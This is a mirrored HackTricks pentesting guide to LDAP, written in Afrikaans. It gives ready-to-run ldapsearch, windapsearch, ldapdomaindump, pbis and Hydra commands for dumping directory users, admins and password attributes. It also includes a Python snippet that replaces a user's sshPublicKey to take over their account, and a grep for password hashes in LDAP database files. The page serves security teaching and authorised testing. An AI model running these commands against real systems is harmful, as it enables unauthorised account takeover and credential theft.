mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-02 09:29:59 +00:00
389 lines
17 KiB
Markdown
389 lines
17 KiB
Markdown
# 389, 636, 3268, 3269 - Pentesting LDAP
|
|
|
|
<details>
|
|
|
|
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Ander maniere om HackTricks te ondersteun:
|
|
|
|
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
|
|
|
|
</details>
|
|
|
|
Die gebruik van **LDAP** (Lightweight Directory Access Protocol) is hoofsaaklik vir die opspoor van verskillende entiteite soos organisasies, individue, en hulpbronne soos lêers en toestelle binne netwerke, beide openbare en private. Dit bied 'n gestroomlynste benadering in vergelyking met sy voorganger, DAP, deur 'n kleiner kodevoetspoor te hê.
|
|
|
|
LDAP-gidse is gestruktureer om hulle verspreiding oor verskeie bedieners moontlik te maak, met elke bediener wat 'n **gerepliseerde** en **gesinchroniseerde** weergawe van die gids huisves, wat verwys word as 'n Directory System Agent (DSA). Die verantwoordelikheid vir die hanteer van versoeke lê heeltemal by die LDAP-bediener, wat indien nodig met ander DSA's kan kommunikeer om 'n eenvormige antwoord aan die versoeker te lewer.
|
|
|
|
Die organisasie van die LDAP-gids lyk soos 'n **boomhiërargie, wat begin met die wortelgids bo-aan**. Dit vertak na lande, wat verder verdeel in organisasies, en dan na organisatoriese eenhede wat verskillende afdelings of departemente verteenwoordig, en uiteindelik die individuele entiteitevlak bereik, insluitend mense en gedeelde hulpbronne soos lêers en drukkers.
|
|
|
|
**Verstekpoort:** 389 en 636 (ldaps). Die Globale Katalogus (LDAP in ActiveDirectory) is verstek beskikbaar op poorte 3268 en 3269 vir LDAPS.
|
|
```
|
|
PORT STATE SERVICE REASON
|
|
389/tcp open ldap syn-ack
|
|
636/tcp open tcpwrapped
|
|
```
|
|
### LDAP Data Interchange-formaat
|
|
|
|
LDIF (LDAP Data Interchange Format) definieer die gidsinhoud as 'n stel rekords. Dit kan ook opdateringsversoeke (Voeg by, Wysig, Verwyder, Hernoem) voorstel.
|
|
```bash
|
|
dn: dc=local
|
|
dc: local
|
|
objectClass: dcObject
|
|
|
|
dn: dc=moneycorp,dc=local
|
|
dc: moneycorp
|
|
objectClass: dcObject
|
|
objectClass: organization
|
|
|
|
dn ou=it,dc=moneycorp,dc=local
|
|
objectClass: organizationalUnit
|
|
ou: dev
|
|
|
|
dn: ou=marketing,dc=moneycorp,dc=local
|
|
objectClass: organizationalUnit
|
|
Ou: sales
|
|
|
|
dn: cn= ,ou= ,dc=moneycorp,dc=local
|
|
objectClass: personalData
|
|
cn:
|
|
sn:
|
|
gn:
|
|
uid:
|
|
ou:
|
|
mail: pepe@hacktricks.xyz
|
|
phone: 23627387495
|
|
```
|
|
* Lyne 1-3 definieer die topvlakdomein local
|
|
* Lyne 5-8 definieer die eerste vlakdomein moneycorp (moneycorp.local)
|
|
* Lyne 10-16 definieer 2 organisatoriese eenhede: dev en sales
|
|
* Lyne 18-26 skep 'n objek van die domein en ken eienskappe met waardes toe
|
|
|
|
## Skryf data
|
|
|
|
Let daarop dat as jy waardes kan wysig, jy baie interessante aksies kan uitvoer. Byvoorbeeld, stel jou voor jy **kan die "sshPublicKey" inligting verander** van jou gebruiker of enige gebruiker. Dit is baie waarskynlik dat as hierdie eienskap bestaan, dan **lees ssh die openbare sleutels vanaf LDAP**. As jy die openbare sleutel van 'n gebruiker kan wysig, **sal jy in staat wees om as daardie gebruiker in te teken selfs as wagwoordverifikasie nie in ssh geaktiveer is nie**.
|
|
```bash
|
|
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
|
|
>>> import ldap3
|
|
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
|
|
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
|
|
>>> connection.bind()
|
|
True
|
|
>>> connection.extend.standard.who_am_i()
|
|
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
|
|
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
|
|
```
|
|
## Sniff duidelike wagwoorde
|
|
|
|
As LDAP sonder SSL gebruik word, kan jy **duidelike wagwoorde in die netwerk duidelik sien**.
|
|
|
|
Jy kan ook 'n **MITM**-aanval in die netwerk uitvoer **tussen die LDAP-bediener en die kliënt**. Hier kan jy 'n **Downgrade-aanval** uitvoer sodat die kliënt die **duidelike wagwoorde** gebruik om aan te meld.
|
|
|
|
**As SSL gebruik word**, kan jy probeer om 'n **MITM** uit te voer soos hierbo genoem, maar deur 'n **vals sertifikaat** aan te bied. As die **gebruiker dit aanvaar**, kan jy die verifikasiemetode afgradeer en die wagwoorde weer sien.
|
|
|
|
## Anonieme Toegang
|
|
|
|
### Om TLS SNI-kontrole te omseil
|
|
|
|
Volgens [**hierdie verslag**](https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/) was dit net deur toegang tot die LDAP-bediener met 'n willekeurige domeinnaam (soos company.com) te verkry, moontlik om die LDAP-diens te kontak en inligting as 'n anonieme gebruiker te onttrek:
|
|
```bash
|
|
ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +
|
|
```
|
|
### LDAP anonieme bindmiddels
|
|
|
|
[LDAP anonieme bindmiddels](https://docs.microsoft.com/en-us/troubleshoot/windows-server/identity/anonymous-ldap-operations-active-directory-disabled) maak dit vir **ongeagtekteerde aanvallers** moontlik om inligting uit die domein te bekom, soos 'n volledige lys van gebruikers, groepe, rekenaars, gebruikersrekeningseienskappe en die domein wagwoordbeleid. Dit is 'n **ouditiewe konfigurasie**, en vanaf Windows Server 2003 word slegs geautehtiseerde gebruikers toegelaat om LDAP-versoeke te inisieer.\
|
|
Nietemin kan administrateurs 'n spesifieke toepassing moes **opstel om anonieme bindmiddels toe te laat** en meer toegang as bedoel is, uitgereik het, waarmee ongeautehtiseerde gebruikers toegang tot alle voorwerpe in AD verkry.
|
|
|
|
## Geldige Gelde
|
|
|
|
As jy geldige gelde het om in te teken op die LDAP-bediener, kan jy alle inligting oor die Domeinadministrateur aflaai deur gebruik te maak van:
|
|
|
|
[ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
|
|
```bash
|
|
pip3 install ldapdomaindump
|
|
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]
|
|
```
|
|
### [Brute Force](../generic-methodologies-and-resources/brute-force.md#ldap)
|
|
|
|
## Opname
|
|
|
|
### Outomaties
|
|
|
|
Deur hiervan gebruik te maak, sal jy in staat wees om die **openbare inligting** (soos die domeinnaam) te sien:
|
|
```bash
|
|
nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials
|
|
```
|
|
### Python
|
|
|
|
<details>
|
|
|
|
<summary>Sien LDAP opsporing met python</summary>
|
|
|
|
Jy kan probeer om 'n LDAP te **opspoor met of sonder geloofsbriewe met behulp van python**: `pip3 install ldap3`
|
|
|
|
Eerste probeer om **sonder** geloofsbriewe te verbind:
|
|
```bash
|
|
>>> import ldap3
|
|
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
|
|
>>> connection = ldap3.Connection(server)
|
|
>>> connection.bind()
|
|
True
|
|
>>> server.info
|
|
```
|
|
As die antwoord `True` is, soos in die vorige voorbeeld, kan jy sekere **interessante data** van die LDAP (soos die **naamgewingskonteks** of **domeinnaam**) bediener verkry vanaf:
|
|
```bash
|
|
>>> server.info
|
|
DSA info (from DSE):
|
|
Supported LDAP versions: 3
|
|
Naming contexts:
|
|
dc=DOMAIN,dc=DOMAIN
|
|
```
|
|
Sodra jy die naamkonteks het, kan jy 'n paar opwindende navrae maak. Hierdie eenvoudige navraag behoort jou al die voorwerpe in die gids te wys:
|
|
```bash
|
|
>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
|
|
True
|
|
>> connection.entries
|
|
```
|
|
Of **dump** die hele ldap:
|
|
```bash
|
|
>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
|
|
True
|
|
>>> connection.entries
|
|
```
|
|
</details>
|
|
|
|
### windapsearch
|
|
|
|
[**Windapsearch**](https://github.com/ropnop/windapsearch) is 'n Python-skrips wat nuttig is om gebruikers, groepe en rekenaars van 'n Windows-domein te tel deur gebruik te maak van LDAP-navrae.
|
|
```bash
|
|
# Get computers
|
|
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
|
|
# Get groups
|
|
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
|
|
# Get users
|
|
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
|
|
# Get Domain Admins
|
|
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
|
|
# Get Privileged Users
|
|
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users
|
|
```
|
|
### ldapsearch
|
|
|
|
Kontroleer nul-gedagtes of as jou geloofsbriewe geldig is:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
```
|
|
|
|
```bash
|
|
# CREDENTIALS NOT VALID RESPONSE
|
|
search: 2
|
|
result: 1 Operations error
|
|
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
|
|
tion a successful bind must be completed on the connection., data 0, v3839
|
|
```
|
|
As jy iets vind wat sê dat die "_bind voltooi moet word_", beteken dit dat die geloofsbriewe nie korrek is nie.
|
|
|
|
Jy kan **alles van 'n domein** onttrek deur gebruik te maak van:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
-x Simple Authentication
|
|
-H LDAP Server
|
|
-D My User
|
|
-w My password
|
|
-b Base site, all data from here will be given
|
|
```
|
|
Trek **gebruikers** uit:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"
|
|
```
|
|
Ekstraeer **rekenaars**:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
```
|
|
Ekstrakteer **my inligting**:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
```
|
|
Trek **Domain Admins** uit:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
```
|
|
Onttrek **Domain-gebruikers**:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
```
|
|
Trek **Enterprise Admins** uit:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
```
|
|
Trek **Administrateurs** uit:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
```
|
|
Trek die **Remote Desktop Groep** uit:
|
|
```bash
|
|
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
|
|
```
|
|
Om te sien of jy toegang het tot enige wagwoord, kan jy grep gebruik nadat jy een van die navrae uitgevoer het:
|
|
```bash
|
|
<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"
|
|
```
|
|
Let asseblief daarop dat die wagwoorde wat jy hier kan vind, nie noodwendig die regte wagwoorde is nie...
|
|
|
|
#### pbis
|
|
|
|
Jy kan **pbis** hier aflaai: [https://github.com/BeyondTrust/pbis-open/](https://github.com/BeyondTrust/pbis-open/) en dit word gewoonlik geïnstalleer in `/opt/pbis`.\
|
|
**Pbis** maak dit maklik om basiese inligting te bekom:
|
|
```bash
|
|
#Read keytab file
|
|
./klist -k /etc/krb5.keytab
|
|
|
|
#Get known domains info
|
|
./get-status
|
|
./lsa get-status
|
|
|
|
#Get basic metrics
|
|
./get-metrics
|
|
./lsa get-metrics
|
|
|
|
#Get users
|
|
./enum-users
|
|
./lsa enum-users
|
|
|
|
#Get groups
|
|
./enum-groups
|
|
./lsa enum-groups
|
|
|
|
#Get all kind of objects
|
|
./enum-objects
|
|
./lsa enum-objects
|
|
|
|
#Get groups of a user
|
|
./list-groups-for-user <username>
|
|
./lsa list-groups-for-user <username>
|
|
#Get groups of each user
|
|
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done
|
|
|
|
#Get users of a group
|
|
./enum-members --by-name "domain admins"
|
|
./lsa enum-members --by-name "domain admins"
|
|
#Get users of each group
|
|
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done
|
|
|
|
#Get description of each user
|
|
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
|
|
echo "$line";
|
|
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
|
|
echo "======================"
|
|
done
|
|
```
|
|
## Grafiese Gebruikerskoppelvlak
|
|
|
|
### Apache Directory
|
|
|
|
[**Laai Apache Directory hier af**](https://directory.apache.org/studio/download/download-linux.html). Jy kan 'n [voorbeeld van hoe om hierdie instrument te gebruik hier vind](https://www.youtube.com/watch?v=VofMBg2VLnw\&t=3840s).
|
|
|
|
### jxplorer
|
|
|
|
Jy kan 'n grafiese koppelvlak met LDAP-bediener hier aflaai: [http://www.jxplorer.org/downloads/users.html](http://www.jxplorer.org/downloads/users.html)
|
|
|
|
Standaard word dit geïnstalleer in: _/opt/jxplorer_
|
|
|
|
![](<../.gitbook/assets/image (22) (1).png>)
|
|
|
|
### Godap
|
|
|
|
Jy kan dit toegang in [https://github.com/Macmod/godap](https://github.com/Macmod/godap)
|
|
|
|
## Verifikasie via kerberos
|
|
|
|
Met behulp van `ldapsearch` kan jy **verifieer** teen **kerberos in plaas daarvan** van via **NTLM** deur die parameter `-Y GSSAPI` te gebruik.
|
|
|
|
## POST
|
|
|
|
As jy toegang het tot die lêers waar die databasisse bevat word (kan in _/var/lib/ldap_ wees), kan jy die hakse uittrek deur die volgende te gebruik:
|
|
```bash
|
|
cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u
|
|
```
|
|
Jy kan John voer met die wagwoordhash (van '{SSHA}' tot 'struktureel' sonder om 'struktureel' by te voeg).
|
|
|
|
### Konfigurasie Lêers
|
|
|
|
* Algemeen
|
|
* containers.ldif
|
|
* ldap.cfg
|
|
* ldap.conf
|
|
* ldap.xml
|
|
* ldap-config.xml
|
|
* ldap-realm.xml
|
|
* slapd.conf
|
|
* IBM SecureWay V3-bediener
|
|
* V3.sas.oc
|
|
* Microsoft Active Directory-bediener
|
|
* msadClassesAttrs.ldif
|
|
* Netscape Directory Server 4
|
|
* nsslapd.sas\_at.conf
|
|
* nsslapd.sas\_oc.conf
|
|
* OpenLDAP-directory-bediener
|
|
* slapd.sas\_at.conf
|
|
* slapd.sas\_oc.conf
|
|
* Sun ONE Directory Server 5.1
|
|
* 75sas.ldif
|
|
|
|
## HackTricks Outomatiese Opdragte
|
|
```
|
|
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
|
|
Port_Number: 389,636 #Comma separated if there is more than one.
|
|
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
|
|
|
|
Entry_1:
|
|
Name: Notes
|
|
Description: Notes for LDAP
|
|
Note: |
|
|
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
|
|
|
|
https://book.hacktricks.xyz/pentesting/pentesting-ldap
|
|
|
|
Entry_2:
|
|
Name: Banner Grab
|
|
Description: Grab LDAP Banner
|
|
Command: nmap -p 389 --script ldap-search -Pn {IP}
|
|
|
|
Entry_3:
|
|
Name: LdapSearch
|
|
Description: Base LdapSearch
|
|
Command: ldapsearch -H ldap://{IP} -x
|
|
|
|
Entry_4:
|
|
Name: LdapSearch Naming Context Dump
|
|
Description: Attempt to get LDAP Naming Context
|
|
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
|
|
|
|
Entry_5:
|
|
Name: LdapSearch Big Dump
|
|
Description: Need Naming Context to do big dump
|
|
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
|
|
|
|
Entry_6:
|
|
Name: Hydra Brute Force
|
|
Description: Need User
|
|
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Ander maniere om HackTricks te ondersteun:
|
|
|
|
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
|
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
|
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
|
|
|
</details>
|